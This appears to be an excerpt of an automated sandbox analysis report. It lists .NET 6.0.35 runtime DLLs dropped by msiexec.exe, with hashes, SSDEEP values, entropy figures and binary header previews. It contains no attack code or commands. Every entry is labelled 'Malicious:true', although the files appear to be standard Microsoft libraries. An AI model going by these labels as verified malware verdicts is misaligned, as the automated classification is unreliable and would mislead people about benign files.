                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Extensions.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15624
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.8012541413925405
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:3t8YJXWKyWWOYA6VFHRN78RxB+R9zP5xE:3tdS2FCl8Rxw9zPE
                                                                                                                                                                                                                                                                                                                                  MD5:359100F45ACC2BA5FC6F2568B06ED5CD
                                                                                                                                                                                                                                                                                                                                  SHA1:466C5050B1844078C01A498C11413CCF626A7FA4
                                                                                                                                                                                                                                                                                                                                  SHA-256:6A993469374344523406736668802D19C0EB9A86A688348866A753B3340EAF33
                                                                                                                                                                                                                                                                                                                                  SHA-512:CC272C6E2DB59C6E890308A6C9D479B4C6F233FE450288AE02B37A4ABC8EE4E13ED8B32579F92EDD6D4A59CF724F8A5AEA67AFFD909ED0E695D1ECF57A9CA280
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....z............"!..0.............n)... ........@.. ...............................y....`..................................)..O....@...................)...`......`(..8............................................ ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........ ......................P ......................................2.. u.Y.....b.I.oi...Z......^...NC.w.........B......Xuu.|].^.K.l...N7..D.j...N.Z[.R....C..f.17X.fWCW.i....d......*9.Uw.D.BSJB............v4.0.30319......`.......#~..0.......#Strings............#GUID...........#Blob......................3..................................................,.....,...3.....L.....^.....a.................w.................w.................G.....I.,.......................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Metadata.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1130656
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.715905432836471
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:Gzj22UrYDBFZmNt+Ll3tMgRrSkM7yTWHt8kJjaJlB9vNR0wyQPoVODzty2el+dj:CVuv+53rRukMZpO/kwhPDzw2el+dj
                                                                                                                                                                                                                                                                                                                                  MD5:B6D60C794F11C5487975EACB167EC9A8
                                                                                                                                                                                                                                                                                                                                  SHA1:0954C3A5693DA7B3F6D3730BC102451DA9E1B89A
                                                                                                                                                                                                                                                                                                                                  SHA-256:FD385C3D3C1B096801497CE0200CF96CBF6C7AA5BA28CD8E51A596FDFF79EF2A
                                                                                                                                                                                                                                                                                                                                  SHA-512:29E4E3A6D03D604DE8092A9D5E8A803C2DFF3A033F1FC613CC1F5411B6E8340AA38A7A375C4FD360B43A6A94A538FF768504A9A4C89CC39FE0057645FDC93541
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...H.)..........." .....4...................................................@......ht....`...@......@............... ..................................h...............(... ..h...xW..T...........................................................h...H............text...>2.......4.................. ..`.data........P.......6..............@....reloc..h.... ......................@..B............................................0.......................X.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........p.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...L.....0.0.0.0.0.4.b.0.........C.o.m.m.e.n.t.s...T.h.i.s. .p.a.c.k.a.g.e.s. .p.r.o.v.i.d.e.s. .a. .l.o.w.-.l.e.v.e.l. ...N.E.T. .(.E.C.M.A.-.3.3.5.). .m.e.t.a.d.a.t.a. .r.e.a.d.e.r. .a.n.d. .w.r.i.t.e.r... .I.t.'.s. .g.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Primitives.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16144
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.766244200871325
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:CCrP0C5xxkWWSq+WB3pWjA6Kr4PFHnhWgN7agWEuWGshHssDX01k9z3AGW87d:r0oWWWSq+WVYA6VFHRN7g+FDR9z7W85
                                                                                                                                                                                                                                                                                                                                  MD5:72C0E8F0C891D0D32883B91C69FAE958
                                                                                                                                                                                                                                                                                                                                  SHA1:DD1231450BB7B72B8E53110C5675BAA86EC6846F
                                                                                                                                                                                                                                                                                                                                  SHA-256:8F9C83135A78C8740068B07FDAFD647BE42484E8BE182A7AAE3D0A345528BA45
                                                                                                                                                                                                                                                                                                                                  SHA-512:589497251EBB975AB5C84DD7B8EC3E40E0DB70CF9F48E88D450D36025B2EEC3D3CEEC28E227A6013ABCB98073A0F886443410A267B871B8FB51FC08F323803D9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"!..0.............^+... ........@.. ...............................p....`..................................+..K....@...................)...`......T*..8............................................ ............... ..H............text...d.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................@+......H........ ......................P ......................................k{.*....U4>\..T.A.....[.c..MA........a..6..P.&T.>.<U..S%...|.t.m:_...nQu.O...Q.a<9^qU....w{n.c...W..O*p......]...}}.ET.G...BSJB............v4.0.30319......`.......#~..........#Strings............#GUID...........#Blob......................3......................................3.........@...........Y...................`.................g...?.g.....g...y.g.....g.....g.....g...`.g...m.g.................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.TypeExtensions.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):33592
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.486828889454643
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:kCWmaeWGlEYc9RSfX0lawccfNXuWrdzy+A2mcpPL91ePX6HRN7Ou0R9zUHm:k3GlDcWEAwcc1+Wc+bmUPLfoWOu49zb
                                                                                                                                                                                                                                                                                                                                  MD5:9D26813D0E4E76BF161DF6467D46593D
                                                                                                                                                                                                                                                                                                                                  SHA1:04100251143A0146FC28F54003E05F34B29C07D2
                                                                                                                                                                                                                                                                                                                                  SHA-256:3B581E1C257AF2B87AC6279BEAE8734E4A79CD3F86335168763BCEA8D495330E
                                                                                                                                                                                                                                                                                                                                  SHA-512:6BA1BE1142254F0F2755596ACF28825C0F43596D6D7D0CF942D40067BCE2B24C38BBED6C82E34301EBD6C21D807745723C8932C181139F9FA7A7BE0B3957397C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...-............." .....P................................................................`...@......@............... ......................................D........Z..8)...p..........T...............................................................H............text....N.......P.................. ..`.data........`.......R..............@....reloc.......p.......X..............@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...Z.!...C.o.m.m.e.n.t.s...S.y.s.t.e.m...R.e.f.l.e.c.t.i.o.n...T.y.p.e.E.x.t.e.n.s.i.o.n.s.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...j.!...F.i.l.e.D.e.s.c.r.i.p.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16656
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.723329527099039
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:mEKi0jWhGCWefYA6VFHRN7P178FDR9z7Wxs:7KtCfFCld0l9z6s
                                                                                                                                                                                                                                                                                                                                  MD5:4564A146B250C1C73E59A6FED69FCA60
                                                                                                                                                                                                                                                                                                                                  SHA1:A9645B6D15EF8799AB5C0FA1D09FD5D01DFC3291
                                                                                                                                                                                                                                                                                                                                  SHA-256:F2DF432950E7751EA35A19C078376A7FEA079E739AD89C1A63CC45B41A07D18F
                                                                                                                                                                                                                                                                                                                                  SHA-512:D3A6B078FDEEB3492B20B442504CD743F84D08DD987E916F768B1222DFF81C73B4B7F72C1F8623695164A9715FC3C1E18ADF1EC2C5C877F54ACBF060ED4E2270
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."!..0..............-... ........@.. ....................................`.................................8-..S....@..h................)...`.......,..8............................................ ............... ..H............text........ ...................... ..`.rsrc...h....@......................@..@.reloc.......`......................@..B................p-......H........ ......................P ..........................................MA.}.]....v"E.~..O`.....H....h...?.6..>..Q]]..D^b..$.T.sR.9.,.X#MlK.O..dU..J.ukG.\...GyQ...c...>.=B3 ...4.....X....`BSJB............v4.0.30319......`.......#~..........#Strings............#GUID... .......#Blob......................3................................#.....a.........z.<.....<.........\.......3.....w...U.....M.....7.....y.................................................<...........

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Resources.Reader.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15624
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.782820861043016
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:WeP4MKrW4N3WmYA6VFHRN7RKVXC4deR9zVjx93:WM4MetFClRKVXC4dC9zVjn3
                                                                                                                                                                                                                                                                                                                                  MD5:1F4727345E2C6782DFBAADC9E9817693
                                                                                                                                                                                                                                                                                                                                  SHA1:F467E2BC1F7D1DE3FAEDC953DC8EC8707B3E9268
                                                                                                                                                                                                                                                                                                                                  SHA-256:4818E3F1CAD2A5B47078C068AB08DC0DFF4110FDC8B525A99523C3D0789BC75A
                                                                                                                                                                                                                                                                                                                                  SHA-512:B925E8166F9E8AB1FA3719FD95E792AD725C427818144E3012C27BD251B4BD109A7447F862D886017CE323FCB815EA7E02B73A4865FCDEC00D457EA51CC5CD17
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."!..0..............)... ........@.. ..............................,R....`..................................(..K....@...................)...`.......(..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H........ ..@...................P ......................................|.....[s..Bn....g..X.}..z..4{.vf...........l.p......0..!..7.Q....W.u.Cg^.....b.7=.y.7.....n.."4.......NHeS..?s.P.........SBSJB............v4.0.30319......`.......#~..........#Strings............#GUID...........#Blob......................3..................................................=.....=...3.*...n.....^.....a.................w.................w.................G.....I.=.................$.....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Resources.ResourceManager.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16176
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.777064915062182
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:LJMER3xxBRvWVxzWteWxNzx95jmHnhWgN7aIW5z45WXYz1X01k9z3AyoFewPe7:OmhLRvWVxzWtlX6HRN7moJR9z/Ke7
                                                                                                                                                                                                                                                                                                                                  MD5:8245CEBD42F6DDE00034133DD1E618B6
                                                                                                                                                                                                                                                                                                                                  SHA1:80A448FFBF1B6DD0FD033AA925D8793B440C486F
                                                                                                                                                                                                                                                                                                                                  SHA-256:ED43F130E2E71AE9C4160D887BDD004105E34B0D353DAFF1F12F7DE7CEFF6737
                                                                                                                                                                                                                                                                                                                                  SHA-512:B8202FDF61803A2C6A071D68F6AD9E0F153E54745044EC298505EED852DF25140992C4FF753C1E8E8FF42AB0FDDFC8D846E1EA1438295C4FD5C83A563663CB5C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"!..0.............^+... ........@.. ..............................b.....`..................................+..O....@..................0)...`......H*..8............................................ ............... ..H............text...d.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................@+......H........ ..x...................P .......................................B0.;...V#...4C.....t...C...5.I8./.....B..}.O...'.=?ky2...)L0..`.A=....U_.w.'Y......h.I..2Y........GK... |?l.=.p...Y..M.BSJB............v4.0.30319......`...h...#~..........#Strings............#GUID...........#Blob......................3......................................M.........f...........].l.................r...A.....9.....#.....!.........................................q...................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Resources.Writer.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):45320
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.5512339771396775
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:6l7vatyqsSfySDzEjI7uG8lZ6KFClfFT9zSG:6JQHjnz+YuGUZifTzSG
                                                                                                                                                                                                                                                                                                                                  MD5:C2406CEA76D202D405D811A647685BCE
                                                                                                                                                                                                                                                                                                                                  SHA1:3CDA5B4AFE38FFD978DCDFE9F06E71BB4A27E458
                                                                                                                                                                                                                                                                                                                                  SHA-256:9146D7B97ED2B0D1BFDA6F75E508A1E4D171ACFFA75D9F061294AA0E64D8D93D
                                                                                                                                                                                                                                                                                                                                  SHA-512:BC74AA88385C1E679FE3D93240B271774D1623060D1A42B66D5CA2D0617268FA0B40278A13D45E3978461CB5A5ED2E6B358643CAE8636D2D05FD5F971C39C66F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................" .....v..........................................................H.....`...@......@............... ..........................................@........)..............T...............................................................H............text....u.......v.................. ..`.data................x..............@....reloc..............................@..B............................................0...........................<.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o...x.....0.0.0.0.0.4.b.0...H.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...R.e.s.o.u.r.c.e.s...W.r.i.t.e.r...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...X.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.CompilerServices.Unsafe.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):22800
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.425734217683911
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:DWgi2WkbXPPGmmOWWWfnpon0YA6VFHRN77Zm9R9zrJRU2:6sHGmmHPFCl7M9zs2
                                                                                                                                                                                                                                                                                                                                  MD5:5EF80C5A289DB81C062B66908A2C6B9F
                                                                                                                                                                                                                                                                                                                                  SHA1:CF799B59D6CD69890592F42238F14337EFBE3B48
                                                                                                                                                                                                                                                                                                                                  SHA-256:C47A7B97F2026DACFC4B5C866429513E10D2C3C39201420E1C3A5624927E706C
                                                                                                                                                                                                                                                                                                                                  SHA-512:CFA3711F94F5291CE9F30EDB8DBA0BFD7C9D219327180F11D597113B997A0DF5EB76E2E2BF7F82F99B5C96B7D027D5E5C50365646DF01FD5C47B1FDF5B7B35E6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.../..f.........." .....*...................................................`............`...@......@............... ......................................$........0...)...P..........8...............................................................H............text...o).......*.................. ..`.data...=....@.......,..............@....reloc.......P......................@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...f.'...C.o.m.m.e.n.t.s...S.y.s.t.e.m...R.u.n.t.i.m.e...C.o.m.p.i.l.e.r.S.e.r.v.i.c.e.s...U.n.s.a.f.e.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...v.'...F.i.l.e.D.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.CompilerServices.VisualC.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20232
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.598667978987244
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:MWspLW2LIrR/TvnaNEcv2YA6VFHRN7eCVCEpcR9zURG:4RLq/TvnaNwFCleCVCEpw9zx
                                                                                                                                                                                                                                                                                                                                  MD5:1EC59746C207B75224D1C170AB65D5D9
                                                                                                                                                                                                                                                                                                                                  SHA1:106EF6FB34DC9B2555A8723603828ADB736A312D
                                                                                                                                                                                                                                                                                                                                  SHA-256:3526B82CFB921E84C749DC54976503441D09FD36F569A0D574FB6819510AB7CA
                                                                                                                                                                                                                                                                                                                                  SHA-512:1DC5606DC607A349DB6A462D317CFCFAEC5D0444479FBC2B8C7F01D2E0E2443711C2E9DD0FAE7A702FB27ADA10DB52CFCDF2D5D7AA4C704911CC4B11516DF829
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................." ..... ...................................................P......#G....`...@......@............... ...............................................&...)...@..........T...............................................................H............text...`........ .................. ..`.data...D....0......."..............@....reloc.......@.......$..............@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...h.(...C.o.m.m.e.n.t.s...S.y.s.t.e.m...R.u.n.t.i.m.e...C.o.m.p.i.l.e.r.S.e.r.v.i.c.e.s...V.i.s.u.a.l.C...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...x.(...F.i.l.e.D.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Extensions.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):18192
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.628514917253588
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:c5y7UByGe9xCEV6mW8/NWMYA6VFHRN7/5FDR9z7WGM:saUByGePrVFClTl9zq
                                                                                                                                                                                                                                                                                                                                  MD5:C692B087C3167E7263397E9B34E94332
                                                                                                                                                                                                                                                                                                                                  SHA1:105D78B07E06E1C28AB69DC7E8CF4A7F6A71AFC3
                                                                                                                                                                                                                                                                                                                                  SHA-256:59692C49D72030F5259052EFAC5BD88BC2D3471450D3F081D64F1E60E2C502E2
                                                                                                                                                                                                                                                                                                                                  SHA-512:8484AF16073C9CDE88E67BECBE2C1C126FC4761323C7A2AD71D869447649A8529D23A3CB779F34E1FE388A0004BD9FEC4B801E1FBB8B527BC39BAC97AE48C2E7
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..............."!..0..............3... ........@.. ....................................`.................................<3..O....@...................)...`.......2..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p3......H........ ......................P .......................................O...u..?...[\.....2..[ y..m....>...,....m..9..GS6...B0d:..]u^...O..E.......a.7F.......i.4#....iH..+..E.y%.Bc...Hm....n..BSJB............v4.0.30319......`...$...#~......l...#Strings............#GUID...........#Blob......................3................................O...............Z.............m.........,.W.........5.............p.....p.....p.....p.....p...E.p...b.p...z.p.....p.................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Handles.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15632
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.822445014968599
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:NHx15LTIWASmWOpWjA6Kr4PFHnhWgN7agWyA8RwX01k9z3AeJRf/R6Lv:NR15LTIWASmWOYA6VFHRN7a9R9zrJRw
                                                                                                                                                                                                                                                                                                                                  MD5:80FC1F4FCBAEBFB32BC62687AB95A9BD
                                                                                                                                                                                                                                                                                                                                  SHA1:C20C3D1039A0B374393694CF0A7921B3FFB54161
                                                                                                                                                                                                                                                                                                                                  SHA-256:6DE0F580DBCCB63C2B6053AC81CDAFD7FDF5C8A1B177D336DD75D9E1DD176E0D
                                                                                                                                                                                                                                                                                                                                  SHA-512:B4E8AED6A8F81F3E7DD206FCCF06BE65E6186700CCDCBD741B08172AE7D6F74EDF2241E59AFDFDCA212DC5AE01B5399AF79F150D4BFDC0D8784714DC930CA133
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...wi............"!..0..............)... ........@.. ....................................`.................................|)..O....@...................)...`.......(..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H........ ......................P ........................................t.[.%{*.d*&.WQ.O.!......."...F.z.NQiqD.....v...gCI?r.U............h.\</]....a..q}V.....d...t.S.. .I..7.^,s.....9..t..&..q.BSJB............v4.0.30319......`.......#~..L.......#Strings....P.......#GUID...`.......#Blob......................3................................................(.x.....x...f.F.................'.........L...........a.......................H.....z.....|.x.................@.....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.InteropServices.RuntimeInformation.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32008
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.450786767544824
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:JYWHcUWW2i5ctERQXIG6KMWFYpmGRIOBB/rSYA6VFHRN792R9zza+X:Jm8SAKMWFkmGakB2FCl9K9zL
                                                                                                                                                                                                                                                                                                                                  MD5:25B91230BE0B6D4FAC1B999ECF8FC76C
                                                                                                                                                                                                                                                                                                                                  SHA1:2D943785738A21D9C2026726C8500A606E022D8E
                                                                                                                                                                                                                                                                                                                                  SHA-256:1A536B20C7FD07A4B156C6C68048AAB24BDDC19786C98704E7EF11FBDDACCA0C
                                                                                                                                                                                                                                                                                                                                  SHA-512:B3AAE1F551B4CE642BF5B347F35186A1F7B8BE08F4F186971FB3D99991C24E5F04BDBFC70EF4A46DB87A420C95ED9E3C1AE0A7B893D5C7B5CF9A5193B1D4D64F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
